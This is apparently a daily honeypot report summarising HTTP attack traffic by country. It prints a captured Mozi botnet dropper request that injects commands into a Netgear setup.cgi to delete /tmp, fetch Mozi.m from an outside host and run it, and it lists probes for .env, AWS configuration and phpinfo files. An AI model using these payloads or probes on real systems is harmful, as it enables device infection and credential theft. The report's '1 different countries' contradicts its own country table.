Report: 2025-04-23

Author
Shoggoth Industries
Daily Report: 2025-04-23

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 46 new requests that have never been observed before (these were added to the monitored request database).

A total of 1674 requests were recorded during the day, originating from 1 different countries, with a peak of 431 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Dubai |
| GB | Georgia |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 84.53.198.174 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://84.53.198.174:55691/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |

request

The requests listed here are those that have not yet been integrated into the request database.

number_of_occurencerequest
254POST /all HTTP/1.1
1961GET //webpages/login.html HTTP/1.1
2031POST /api/user/binLookup?time=1745369171337875278 HTTP/1.1
2041GET /api/bin/440393?time=1745369170835361078 HTTP/1.1
2391POST /api/user/binLookup?time=1745368665861767786 HTTP/1.1
2401GET /api/bin/440393?time=1745368665457778723 HTTP/1.1
2411GET /config/index?time=1745367532087813904 HTTP/1.1
2471GET /XVhG HTTP/1.1
2481GET /ZYp9 HTTP/1.1
2751GET /FwPP HTTP/1.1
2761GET /UUeM HTTP/1.1
2821POST /mgmt/tm/util/bash HTTP/1.1
3061GET /api2/.env HTTP/1.1
3121GET /core/Database/.env HTTP/1.1
3201GET /.env.py HTTP/1.1
3371GET /docker-compose/.env HTTP/1.1
3381GET /database/backup/.env HTTP/1.1
3421GET /api/system/.env HTTP/1.1
3441GET /administrator/config/.env HTTP/1.1
3451GET /admin/backup/.env HTTP/1.1
3461GET /admin/db/.env HTTP/1.1
3491POST /aws.yml HTTP/1.1
3521POST /_profiler/phpinfo HTTP/1.1
3551POST /%C0 HTTP/1.1
3601GET /setting/.env HTTP/1.1
3671POST /info.php HTTP/1.1
3681POST /frontend_dev.php HTTP/1.1
3691POST /frontend/web/debug/default/view HTTP/1.1
3721POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1
3731POST /debug/default/view?panel=config HTTP/1.1
3741POST /debug/default/view.html HTTP/1.1
3751POST /debug/default/view HTTP/1.1
3761POST /config/aws.yml HTTP/1.1
3771POST /config.js HTTP/1.1
3811POST /symfony/public HTTP/1.1
3831POST /sapi/debug/default/view HTTP/1.1
3891POST /phpinfo.php HTTP/1.1
3901POST /phpinfo HTTP/1.1
3971GET /api/bin/440393?time=1745368639584839159 HTTP/1.1
3981GET /config/index?time=1745367509457219171 HTTP/1.1
4061POST /wp-config.php-backup HTTP/1.1
4071POST /web/debug/default/view HTTP/1.1
4111POST /tool/view/phpinfo.view.php HTTP/1.1
4121POST /symfony/public/_profiler/phpinfo HTTP/1.1
4281POST /api/user/binLookup?time=1745368640010425730 HTTP/1.1
5411GET /config/index?time=1745368057477993246 HTTP/1.1

country_iso_code

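| | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 431 | US |
| 1 | 429 | GB |
| 2 | 142 | NL |
| 3 | 124 | SC |
| 4 | 110 | PL |
| 5 | 96 | DE |
| 6 | 79 | HK |
| 7 | 71 | CN |
| 8 | 33 | CA |
| 9 | 16 | TW |
| 10 | 15 | JP |
| 11 | 14 | FR |
| 12 | 14 | IN |
| 13 | 12 | UA |
| 14 | 12 | KR |
| 15 | 7 | AU |
| 16 | 6 | PT |
| 17 | 6 | MY |
| 18 | 6 | BE |
| 19 | 5 | ZA |
| 20 | 4 | SG |
| 21 | 4 | VE |
| 22 | 4 | IT |
| 23 | 4 | AO |
| 24 | 3 | TR |
| 25 | 3 | RO |
| 26 | 3 | BR |
| 27 | 3 | ID |
| 28 | 3 | RU |
| 29 | 2 | IL |
| 30 | 2 | MC |
| 31 | 2 | VN |
| 32 | 2 | TH |
| 33 | 1 | NP |
| 34 | 1 | ES |
| 35 | 1 | BG |
| 36 | 1 | EE |
| 37 | 1 | IR |
| 38 | 1 | SK |
| 39 | 1 | SE |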
